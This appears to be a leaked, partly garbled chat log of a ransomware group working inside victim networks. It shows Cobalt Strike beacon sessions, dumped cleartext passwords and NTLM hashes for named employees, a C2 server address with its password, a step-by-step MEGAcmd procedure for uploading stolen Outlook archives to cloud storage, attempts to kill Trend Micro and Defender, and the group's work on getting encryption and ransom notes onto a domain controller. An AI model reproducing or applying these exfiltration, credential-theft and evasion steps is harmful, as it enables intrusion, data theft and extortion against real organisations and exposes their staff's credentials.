she has a new version?
she seems to connect when she needs access to network drives
for the old version we know ...
can you check if the user is not currently connected, the console version you do not know?
we have a tunnel through the VPN to the subnet from where you can access the DC. But we can not do anything well from the fact that our computer is not in the domain. Plus the user is not an administrator. Inveigh also can not catch anything. In addition there are shares available to write. Yesterday we wanted to replace the shortcuts in them, but not yet - not sure that the idea is good. In general, the situation so far is a stalemate. Maybe there is a solution, where to go in such a situation?
We should have at least some kind of feedback on the networks, what is closed and what is not, so there would be no such situations, provided that now we know that for closed networks there are bonuses
for 2 networks there were definitely bonuses, i remember it))))
we had a few bonuses after training and one before january, when asked what the bonus was for - "for a good mood"
i think i said that one was
i was told that you had bonuses for closed nets + one second
@tl1 please add me in `sccy.com`
without fuck-ups
so let's fuck up the quality, in the end everyone will be on the plus side, so do it from the 1st time
we do not do anything offline(
not the fact that there were no offline backups
all rolled back
And if we finish with 2 times?
well, let's just say that successfully = a no-fail network, completely paralyzed
The question of premiums will be solved today. now more motivated. today I personally vouch for the premiums on successfully closed nets, draw a line
The answer is always the same! What I was given out I handed out
the question to him, you are there amateur activity about which no one knows but you)
the Offices got it, we'll be more vigilant and make more effort, I hope our efforts will not go unnoticed
or wait, I got 2 or 3 thousand that month more than others, but I spent at work and gasoline for 4)
who promised?
Let's say they promised me a prize for the forum, I fucked 3 days off doing the forum.
i got nothing
when there should be at least 2, let's say even 1
so is 1 prize a reason to say that they have?
about bonuses the question is open
i also remember it, but @user3 maybe not thim lidovna
but you who did not congratulate?) the new year was not even congratulated before january
recently have not fucking closed, if i'm right
probably will come to you now, specify about bonuses
or we fucking have not closed?
Where are they? What bonuses? Seriously? This is the first time we've heard, I honestly don't understand.
you get bonuses for successfully closed networks. don't you need them?
hello there, what are we working on?
good night
bz tomorrow by 4, one more hour of work in #ballymoregroup-com, turned off the VPN, it was not found, other machines could not get, then helped in #sccy-com, jumped on the cars where the guys sit who in theory go to the nas - deaf, the creds from them in the search.
ESXi outside domains
And creds for them
rtp
```
>memberOf : CN=VEEAMAdmins
bbuerck
```
```
>memberOf: CN=VEEAMUsers
dch
wstange
```
```
>sAMAccountName: veeam_service
>sAMAccountName: vmbackup
```
Passed in both trusts (in alloy to server, in winona to dc)
YES to alloy.
```
List of domain trusts:
    0: GAPROC (null) (Direct Outbound) (Direct Inbound)
    1: RTPCO rtpco.local (Direct Outbound) (Direct Inbound)
    2: ALLOY us.alloypolymers.com (Forest tree root) (Primary Domain) (Native)
```
willdaydaydanu what would not be deleted 50 normal?
if your coba not deleted them usually 300 + how much slipsoe goodnight clean files before tomorrow slipsoe tomorrow as usual then finish for today joined user1, throw in the confab + I help those who do not have sessions help those who have them write me to конфу@tl1HN.LOCAL Pomayu alexandruokne, still throw me a session in the slipstream may have a file with authorization or with the creed, maybe lucky you what do you mean by configs citrix?then you go out now looking for citrix configsx apparently yes@tl1 i think the machine is not in the domain at all+@tl1 i have a session hung up i took myself INTUNETEST, the domain does not show, as i gather the info i will write you.com those who do not have their networking confab write domains+will have something to work with if they fall off, if there are not taken - take away +++ all taken?losalna write the domains to make the confu da, starta I do not I do not I have no immediately do myself a spawn wait I have not + took one secws2 so far what 3 disassembled? yesok rephrase, where to turn off plugins? or you mean cna modules? it turns out only 3 sessions as an option turn off all plugins and then turn on one by one, do not bother yet@tl1 In the other hang open where can I check it?although there has been a minute timeout someone of you is a plugin that deletes "inactive" sessionsа where they disappear where have they gone? Where have sessions leftcreate a confab when your session reaches the coba check that arrives, if AV lab simply user1-9 without group binding * come in, choose a session, make a spawn in your coba, in the comment to the session, write what user took, I do confabobshak? 107.161.123.170:50050 DCYZLqYmoVxQj2ITcxQ8rXA5zkAttl ``Where are the objects while you have time to remember yesterday's material@tl1 We have datacenter2 so on rdp and won't let you in... Reboot it or something. Reply from 192.168.0.222: Destination host unreachable. Reply from 192.168.0.222: Destination host unreachable. 
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
```
```
beacon> shell ping BOBXPS.waterway.com
[*] Tasked beacon to run: ping BOBXPS.waterway.com
[+] host called home, sent: 55 bytes
[+] received output:

Pinging BOBXPS.waterway.com [192.168.0.18] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.

Ping statistics for 192.168.0.18:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

beacon> shell ping BobsLaptop.waterway.com
[*] Tasked beacon to run: ping BobsLaptop.waterway.com
[+] host called home, sent: 59 bytes
[+] received output:

Pinging BobsLaptop.waterway.com [192.168.90.3] with 32 bytes of data:
Reply from 192.168.90.3: bytes=32 time=138ms TTL=127
Reply from 192.168.90.3: bytes=32 time=59ms TTL=127
Reply from 192.168.90.3: bytes=32 time=149ms TTL=127
Reply from 192.168.90.3: bytes=32 time=63ms TTL=127

Ping statistics for 192.168.90.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 59ms, Maximum = 149ms, Average = 102ms
```
```
beacon> shell dir \\192.168.90.3\D$
[*] Tasked beacon to run: dir \\192.168.90.3\D$
[+] host called home, sent: 52 bytes
[+] received output:

The network path was not found.

beacon> shell dir \\192.168.0.18\C$
[*] Tasked beacon to run: dir \\192.168.0.18\C$
[+] host called home, sent: 52 bytes
[+] received output:

The network path was not found.
```
```
beacon> shell wmic /node:192.168.90.3 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.90.3 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:

Node - 192.168.90.3
ERROR:
Description = The RPC server is unavailable.
beacon> shell wmic /node:192.168.0.18 logicaldisk get description,name [*] Tasked beacon to run: wmic /node:192.168.0.18 logicaldisk get description,name [+] host called home, sent: 87 bytes [+] received output: Node - 192.168.0.18 ERROR: Description = The RPC server is unavailable. ``I wanted to clarify it tooBobsLaptopBOBXPS( ``` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Bob Administrator 1853Gators [*] Tasked beacon to run .NET program: SharpSniper.exe Bob Administrator 1853Gators [+] host called home, sent: 113763 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. In fact, only he left>name: Bob Dubinsky from here `CN=IT `let's look into the other technareim I think they made for their admins left-handed users.So they wrote that have tried all the YES with and without the domain and with different variations of passwords) geez, we should try nimblewhere?there everything is clean there i checked the centers and vmvar was not seen except for the link in the browser in the doc that i threw a long time ago showed the settings nimbles are associated with hypervisors no or vmvarevcentronu and what virtualization center are you talking about?)hypervisor)is that even what? on the one I threw vmvare - empty there can be access to the disk with snapshots from nimble nimble have the ability to integrate into such things blauer you do not have go to the center of virualization there is such on the techs? https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/wmt1480648506910.html ``just in case i also tried root:root have you triedadmin:admin? 
``` >operatingSystem: Hyper-V Server ``there's only something like this ``` >description: Failover cluster virtual network name account ``` ``` >servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01 >servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01.waterway.com >servicePrincipalName: Microsoft Virtual Console Service/WWHV01 >servicePrincipalName: Microsoft Virtual Console Service/WWHV01.waterway.com >servicePrincipalName: Microsoft Virtual Console Service/WWHV01 waterway. URL : https://store.vmware.com/store/ Username : mharper@waterway.com Password : 1Vanilla2 ``` there is such you have found in vcenter? on request goyya in slack found only access on wwsql-messages much and searches dolnoosch to push? at mail on Root and with different variations of clears that found already and with @ and through slash tried[ ](https://mediaeveryone.com/group/waterway-com?msg=q9dxQCkFZ5u9xASRH) them it seems the first checkA with domains on nimbel do not roll?)ah, well there empty I just see that in the dashboard are also esks, you can not look :) what? esksynu did not anything interesting? then check the rest of the grouppusto there in ncentral is a group eskha suddenly too fast beacon?) nothing there beaconednu and screenshots along the way did I do so ``` shell start /b MEGAcmdServer.exe shell MEGAclient.exe login ``[ ](https://mediaeveryone.com/group/waterway-com?msg=MaLx72xmqbWiJ5J58) just now saw) no. not so. 
through execute192.168.0.254 and then in the psentrall let's run with the domains their passwords with root what is thereDid everyone try the admin account?[ ](https://mediaeveryone.com/group/waterway-com?msg=QC5rcecgmouaadQh7) -tied!!!yes, binding to the domain and you should specify the domain or Rootmb domain?or take their mailboxes and delete the message about successful authorization from all of us wait until they leavetwo variatudes, already found the creeds[ ](https://mediaeveryone.com/group/waterway-com?msg=gqZeK3Fm7KJkoQg4H).okeytak more beautifula what is it for? `WATERWAY\djarden MyNewPassword6 ``why I concluded that it is local andpakot where I throw the sock gets to vvdk2 and when you connect there by rds dedik` `` C:\Users\Administrator>ping -n 1 127.0.1.1 Pinging 127.0.1.1 with 32 bytes of data: Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.1.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: ``with dk2''. beacon> shell ping -a -n 1 127.0.1.1 [*] Tasked beacon to run: ping -a -n 1 127.0.1.1 [+] host called home, sent: 53 bytes [+] received output: Pinging 127.0.1.1 with 32 bytes of data: Reply from 127.0.1.1: bytes=32 time<1ms TTL=128 Ping statistics for 127.0.1.1: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ```+ ``` * Username : djarden * Domain : WATERWAY * Password : MyNewPassword6 ``Yes, that's why there's no union on any host under creeds``. 
* Username : djarden@waterway.com * Domain : (null) * Password : DJarden6 `````` msv : [00000003] Primary * Username : djarden * Domain : WATERWAY * NTLM : 8c7ce287451c3bbd94b08733f0d4f8d7 * SHA1 : d5ee0ca5701d49cd73ffe72244bc481fbecf29e6 * DPAPI : 8b55a307cd3193b311053ee63498ecda tspkg : * Username : djarden * Domain : WATERWAY * Password : MyNewPassword6 ``logon from winlogon request or browser history if not, then logonpasswordsdetermine hash first check it win10? is there a session there? do I have a netego clear pass?[ ](https://mediaeveryone.com/group/waterway-com?msg=ktF5emnAqvxCPLyA7) relatively fresh...[ ](https://mediaeveryone.com/group/waterway-com?msg=6fjrvSMLTyH4ABN4i) on ip 127....04/25/2019 09:51:35 AMDate of message?check your mail...and it's mostly requests for changeover password 200+ results[ ](https://mediaeveryone.com/group/waterway-com?msg=nWZSfPGBEWbrKpQGC) here's tacoenu useless info there[ ](https://mediaeveryone.com/group/waterway-com?msg=YJ8DGBmfEcKZKN9TA) 1there's mostly tacoenu by nimble did you search only by ip? beacon> shell ping -a 192.168.0.75 [*] Tasked beacon to run: ping -a 192.168.0.75 [+] host called home, sent: 51 bytes [+] received output: Pinging nimble-group1.waterway.com [192.168.0.75] with 32 bytes of data: Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Reply from 192.168.0.75: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.0.75: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``And the host is called something else and I don't think it's a group without a domain. nimble-group1.waterway.com nimble...did you check the hostname? 2 years ago it was the same but we tried to check harper's access or you mean rdcheck my mail? 
if harper's online should i check it
but i don't know if it's 192.168.0.
If he's not online, should he check on his desktop?
I think he has notes on the desktop where he may have access ...
screenshot of the desktop ...
in processes only if he does not have a dropbox hanging
in his browser
SauronEye.exe -d C: D: G: Q: -c 192.168.0.43 -f .* -s
okay later let's have a look, I think the sauron setting is wrong, it doesn't find it, check it in DJ too
```
=== SauronEye ===

Directories to search: C:, D:, G:, Q:, password, nimble, pwd
For file types: .*
Containing:
Search contents: True
Search Office 2003 files for VBA: False
Max file size: 1024 KB
Search Program Files directories: True

Searching in parallel: C:
Searching in parallel: G:
Searching in parallel: D:
Searching in parallel: Q:
Searching in parallel: password
Searching in parallel: nimble
Searching in parallel: pwd
[*] Done searching file system, now searching contents
[*] Done searching file system, now searching contents
Done. Time elapsed = 00:00:00.0388757
```
have you tried sauron?
have you downloaded it?
```
beacon> shell start /b MEGAcmdServer.exe
[*] Tasked beacon to run: start /b MEGAcmdServer.exe
[+] host called home, sent: 57 bytes
```
```
beacon> shell MEGAclient.exe update --auto=off
[*] Tasked beacon to run: MEGAclient.exe update --auto=off
[+] host called home, sent: 63 bytes
[+] received output:

-------------------------------------------------------------------------------
| ENABLING AUTOUPDATE BY DEFAULT.
You can disable it with "update --auto=off" | ------------------------------------------------------------------------------- Automatic updates disabled ``` ``` beacon> shell MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd [*] Tasked beacon to run: MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd [+] host called home, sent: 98 bytes [+] received output: ------------------------------------------------------ | Our revised Terms of Service, Privacy and Data Policy, and Takedown Guidance | | Policy apply from January 18th 2021 | | View Terms: https://mega.nz/updatedterms | | Execute "psa --discard" to stop seeing this message | ------------------------------------------------------------------------------- ``` ``` beacon> shell MEGAclient.exe whoami [*] Tasked beacon to run: MEGAclient.exe whoami [+] host called home, sent: 52 bytes [+] received output: Account e-mail: jyszkivtedxvrqbbit@upived.online ``` ``` beacon> shell MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z" [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z" [+] host called home, sent: 121 bytes ``Well, that's how it turns out that the computer's been lagging so badly!`` ``` 3) Start background MEGAcmdServer.exe ``` it turns out: ``` shell start /b MEGAcmdServer.exe ``` and go Or I just do conditionally ``` shell MEGAclient.exe login .... ``` and it's ok? why? 1) Create folder for files 2) Uploads exe and dll files to created folder ``Read the guide files and it will take 2 gb, about 20 min. 
MegaNZ usage 1) Create folder for files 2) Uploads exe and dll files to created folder 3) Start background MEGAcmdServer.exe 4) Use the commands: > MEGAclient.exe update --auto=off # disable autoupdate for megacmd > MEGAclient.exe login login password # init session by creds > MEGAclient.exe # check connection > MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process] > MEGAclient.exe ls # check remote directory > MEGAclient.exe logout # end session > MEGAclient.exe quit # kill MEGAcmdServer.exe 5) Remove special folder for MEGAcmd. 6) Remove update task from schtasks: > schtasks /query /FO list | findstr /i "mega" > SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F example: > MEGAclient.exe update --auto=off Automatic updates disabled > MEGAclient.exe login supertest@mail.test P@$$w0rd > MEGAclient.exe whoami Account e-mail: supertest@mail.test > MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt > MEGAclient.exe ls test.txt > MEGAclient.exe logout Logging out... > MEGAclient.exe quit > schtasks /query /FO list | findstr /i "mega" Folder: \MEGA TaskName: \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000 > SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F ``Console mega client''. WW99NAS - Synology DiskStation - Mozilla Firefox ======= [backspace]Ui0wyarwy08!Watray0n08 ```ggZxzf8Z1rhnIzswMo86-Q so and so кудаjyszkivtedxvrqbbit@upived.online teguiQWERmjsd to anonymous disposable mailchat through torregej ak heremeganz2 gba further tell me how to do it faster to start in the archive):zany_face:so what to 7zip and see you tomorrow? [-] screenshot from desktop 1 is empty ``I mean the screenshot`` Directory of C:\Users\Djarden\Desktop 01/02/2021 10:07 AM . 01/02/2021 10:07 AM . 
07/23/2019 08:05 AM 9,780,208 05 loyalty log on 07.23.2019 cargo not working.txt 02/04/2019 02:23 PM 1,097 1 Everything you need.xlsx - Shortcut.lnk 02/12/2019 01:55 PM 2,153 2018FirewallReview .xlsx - Shortcut.lnk 08/29/2019 09:03 PM 59,664 2019 Import into PDI.xlsx 10/16/2019 03:46 PM 2,368 2019 Wash and Membership Price Changes.xlsx - Shortcut.lnk 07/22/2019 07:39 AM 0 60bainbridge.txt 08/22/2020 01:15 PM 1,049,521 Base CCC Discounts.xlsx 01/31/2019 09:10 PM 1,104 Calls.xlsx - Shortcut.lnk 01/30/2018 08:58 AM 1,075 ccc - Shortcut.lnk 01/10/2020 09:59 AM 11,573 Copy of Declined Card Log for 31.xlsx 06/05/2019 10:22 AM 400 Daily Processing.appref-ms 04/20/2017 03:09 PM DBF files 11/04/2019 02:09 PM 0 DRB times.txt 01/09/2019 12:53 PM 1,303 Dropbox.lnk 06/01/2016 12:29 PM 22,528 Email on Phone Instructions.doc 06/27/2019 10:12 PM 1,517 Examples of spam.txt 10/24/2019 01:56 PM Express_ENU 03/07/2019 09:02 AM 573 Fast Pass Lookup.sql 01/24/2019 09:51 AM 2,466 GitHub Desktop.lnk 09/10/2019 10:46 AM 11,233,441 HHSupport_20190910_1144.zip 07/19/2019 02:15 PM 54 I auditor.txt 11/23/2020 09:15 AM 9,175,040 Intranet.mdb 01/11/2019 12:21 PM ipad crap 11/27/2018 04:16 PM 632 IT - Shortcut.lnk 06/19/2019 03:32 PM 516 Kingshighway email.txt 08/09/2019 12:11 PM 57,300 KingshighwayLoyalty.xlsx 01/06/2020 11:26 AM Logs from #61 01/06/2020 11:27 AM 4,703 Logs from #61.zip 12/11/2019 12:25 PM 10 logs.txt 07/22/2019 07:46 AM 1,271,961 Loyalty log 5 after loyalty code change.txt 10/24/2019 09:34 AM Lty Database #22 06/02/2018 08:06 AM 701 Marketing Folder.lnk 09/16/2019 08:34 AM 1,324 MarketingPLUs .xlsx - Shortcut (2).lnk 04/03/2020 08:28 AM 1,295 Microsoft SQL Server Management Studio 18.lnk 01/30/2018 12:12 PM Mobile Device Center Windows 10 1709 Fix 02/06/2019 05:19 PM 775 My F Drive Folder.lnk 09/20/2019 01:42 PM 16,734 NATHAN MARY.docx 01/06/2020 10:43 AM New folder 06/18/2019 12:03 PM Notes to portal 12/03/2019 09:00 AM 2,435 OneNote 2016.lnk 02/07/2018 11:11 AM 4,089 Phone & 
Internet Providers.xls - Shortcut.lnk 08/11/2020 09:39 AM Printer 06/19/2019 10:11 AM Program Data Zip 12/24/2020 11:55 AM 87,778 Program Data Zip (2).zip 08/24/2017 02:50 PM 4,064 Program License.lnk 01/31/2017 02:40 PM 1,215 Remote Desktop Connection.lnk 01/22/2020 10:48 AM 2,359 RemoteDesktopManagerFree.lnk 01/06/2020 10:48 AM 2,236 RingCentral Meetings.lnk 09/19/2019 02:44 PM 1,361 Safety Tablets and Iauditor Info.lnk 01/02/2021 10:07 AM 2,250 Slack.lnk 07/14/2018 12:53 PM 1,342 Spotify.lnk 10/20/2019 05:13 PM 2,141 SQL Edits.xlsx - Shortcut.lnk 05/07/2018 03:27 PM 1,134 System Scheduler.lnk 12/11/2019 03:33 PM Tickets 02/19/2020 11:14 AM 906 Transfer Look up.sql 07/18/2019 04:07 PM 9,471,921 Unit 05 Loyalty Log issues with Cargo Charges.txt 11/13/2019 12:51 PM 18,459 Unit 31 11/12/2019.xlsx 01/06/2020 10:44 AM 770,963 Unit 61 files 01062020.zip 02/07/2019 01:11 PM 2,390 Upgrading internet service providers.xlsx - Shortcut.lnk 02/12/2019 01:56 PM 19,879 waterway 2-11.xlsx 04/22/2019 11:57 AM 17,690 waterway 4-22.xlsx 05/15/2019 10:18 AM 17,953 waterway 5-9.xlsx 01/30/2018 11:47 AM 2,435 Windows Mobile Device Center.lnk 07/24/2018 12:40 PM 3,486 wwsql ccc KingshighwayLoyalty.odc he doesn't have any notes on his desktop by any chance? DJARDEN maybe it's there maybe we can get his backup correspondence they must have access within the car he probably deleted all the way there's no fucking thing or on the cars maybe he can find something on nimble try it maybe sauron can look it up?it's a slack, i'm for me, where's it from and where? ok, i'll check his history, he also has info on nimbleDJARDEN\c$\Users\DjardenDo you know where to click x to win? try him, i don't) `DESSINGAUDY\administrator DressinGaudy4` have you tried him? 
```
 PID    PPID   Name                                        Arch  Session  User
 ---    ----   ----                                        ----  -------  ----
 0      0      [System Process]
 4      0      System                                      x64   0        NT AUTHORITY\SYSTEM
 2320   4      smss.exe                                    x64   0        NT AUTHORITY\SYSTEM
 1532   10816  HostedAgent.exe                             x86   0        NT AUTHORITY\SYSTEM
 1988   1532   conhost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 7364   1532   logWriter.exe                               x86   0        NT AUTHORITY\SYSTEM
 12808  7364   conhost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 2444   2436   csrss.exe                                   x64   0        NT AUTHORITY\SYSTEM
 2520   2512   csrss.exe                                   x64   1        NT AUTHORITY\SYSTEM
 2528   2436   wininit.exe                                 x64   0        NT AUTHORITY\SYSTEM
 2656   2528   services.exe                                x64   0        NT AUTHORITY\SYSTEM
 2416   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
 2992   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5264   2992   WmiPrvSE.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE
 8920   2992   rundll32.exe                                x64   1        DRESSINGAUDY\Administrator
 13528  2992   WmiPrvSE.exe                                x64   0        NT AUTHORITY\SYSTEM
 27592  2992   WmiPrvSE.exe                                x86   0        NT AUTHORITY\NETWORK SERVICE
 38536  2992   ApplicationFrameHost.exe                    x64   1        DRESSINGAUDY\Administrator
 3052   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
 3216   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 3224   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 3364   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 3436   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
 3644   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 4364   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 4608   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
 5012   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5180   2656   spoolsv.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5268   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5336   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5372   2656   BaCBTStatusTracking.exe                     x86   0        NT AUTHORITY\SYSTEM
 5380   2656   BackupExtender.exe                          x86   0        NT AUTHORITY\SYSTEM
 5404   2656   Microsoft.ActiveDirectory.WebServices.exe   x64   0        NT AUTHORITY\SYSTEM
 5416   2656   LMIGuardianSvc.exe                          x64   0        NT AUTHORITY\SYSTEM
 5436   2656   snmp.exe                                    x64   0        NT AUTHORITY\SYSTEM
 5444   2656   ramaint.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5480   2656   QBIDPService.exe                            x86   0        NT AUTHORITY\SYSTEM
 5512   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 34252  5512   w3wp.exe                                    x64   0        IIS APPPOOL\DefaultAppPool
 5520   2656   dns.exe                                     x64   0        NT AUTHORITY\SYSTEM
 5536   2656   dsm_sa_eventmgr64.exe                       x64   0        NT AUTHORITY\SYSTEM
 5560   2656   dsm_sa_datamgr64.exe                        x64   0        NT AUTHORITY\SYSTEM
 5568   2656   QBCFMonitorService.exe                      x86   0        NT AUTHORITY\SYSTEM
 5576   2656   ScreenConnect.ClientService.exe             x86   0        NT AUTHORITY\SYSTEM
 4936   5576   ScreenConnect.WindowsClient.exe             x64   1        DRESSINGAUDY\Administrator
 11660  5576   ScreenConnect.WindowsClient.exe             x64   1        NT AUTHORITY\SYSTEM
 5600   2656   sqlbrowser.exe                              x86   0        NT AUTHORITY\LOCAL SERVICE
 5608   2656   sqlwriter.exe                               x64   0        NT AUTHORITY\SYSTEM
 5620   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
 5732   2656   SSUService.exe                              x86   0        NT AUTHORITY\SYSTEM
 5740   2656   ismserv.exe                                 x64   0        NT AUTHORITY\SYSTEM
 5832   2656   QBDBMgrN.exe                                x86   0        NT AUTHORITY\SYSTEM
 5848   2656   atashost.exe                                x86   0        NT AUTHORITY\SYSTEM
 5864   2656   dfsrs.exe                                   x64   0        NT AUTHORITY\SYSTEM
 7680   2656   vds.exe                                     x64   0        NT AUTHORITY\SYSTEM
 7784   2656   TmListen.exe                                x64   0        NT AUTHORITY\SYSTEM
 12008  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 13712  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 16748  13712  dasHost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
 13808  2656   msdtc.exe                                   x64   0        NT AUTHORITY\NETWORK SERVICE
 13916  2656   svcGenericHost.exe                          x86   0        NT AUTHORITY\NETWORK SERVICE
 14124  2656   Intuit.QBDT.Webconnector.QBWCMonitor.exe    x86   0        NT AUTHORITY\SYSTEM
 13968  14124  Intuit.QBDT.Webconnector.Application.exe    x86   1        DRESSINGAUDY\Administrator
 14496  2656   TmCCSF.exe                                  x64   0        NT AUTHORITY\SYSTEM
 15348  2656   Ntrtscan.exe                                x64   0        NT AUTHORITY\SYSTEM
 16340  2656   LogMeIn.exe                                 x64   0        NT AUTHORITY\SYSTEM
 19640  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
 2672   2528   lsass.exe                                   x64   0        NT AUTHORITY\SYSTEM
 2580   2512   winlogon.exe                                x64   1        NT AUTHORITY\SYSTEM
 3124   2580   dwm.exe                                     x64   1        Window Manager\DWM-1
 36984  2580   fontdrvhost.exe                             x64   1        DRESSINGAUDY\Administrator
 41508  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
 45152  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
 45596  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
 2932   3484   sihost.exe                                  x64   1        DRESSINGAUDY\Administrator
 3848   15192  PccNtMon.exe                                x64   1        DRESSINGAUDY\Administrator
 4376   5632   explorer.exe                                x64   1        DRESSINGAUDY\Administrator
 14284  12980  QBWebConnector.exe                          x86   1        DRESSINGAUDY\Administrator
```
what processes are active?
and not from the lada?
get your lan dk up there, there's an admin av
i turned on the rdp, now let me in, but it does not let me into Windows - an error, something with the profile
Where can you not go?
https://www.bleepingcomputer.com/forums/t/617257/ransomnotecleaner-remove-ransom-notes-left-behind/
Give me a session
/agent-deactivate-start-stop.html
```
Pinging accounting2.DressinGaudy.local [172.16.1.247] with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.
```
Trendmicro is scrambling the note? You have to turn it off anyway.
the text is scrambling
it's deleting it. this can be fixed, but av will still block the build itself
Did you throw dasox from a different place on the dk?
```
====== AntiVirus ======
Engine       : Trend Micro Security Agent
ProductEXE   : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

Engine       : Trend Micro Security Agent
ProductEXE   : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe
```
fuck... can't kill the av process like this
get up there
just trendmicro?
ahah
av still deleted
well, i took the process down through cmd
can't kill the av process?
let's make a vid and spread out
why on dk?
can't go to dk
if on dk, can't get to dk, how?
in any case, drop av
with the message deleted
for sure, uploaded a readme with the content "123" by hand, threw it in and it disappeared
disable av and windef
not sure that it encrypts everything
it starts, and then av blocks it in the process
the bastards will remove the download
and upload the file 123 as readme.txt, here i copied
where did you type readme?
asked to download what file?
do it through echo)
```
beacon> shell echo 1 > C:\readme.txt
[*] Tasked beacon to run: echo 1 > C:\readme.txt
[+] host called home, sent: 53 bytes

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:

 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

01/19/2021  05:07 PM                 4 readme.txt
               1 File(s)              4 bytes
               0 Dir(s)  541,679,837,184 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:

1
```
I throw it in the root and it disappears
```
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes

beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:

 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
```
echo 1 > C:\readme.\ exactly there?
```
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes

beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:

 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found
```
I don't know if it's correct
and don't know if everything
just put in C:\
put in the same 5 pc
yes, by hand everything encrypts, only the file doesn't appear
by hand
* by hand put in DC
don't know how long will it be?
- Trend and other things have turned off everything?
- And in others?
Here lies accounting2
```
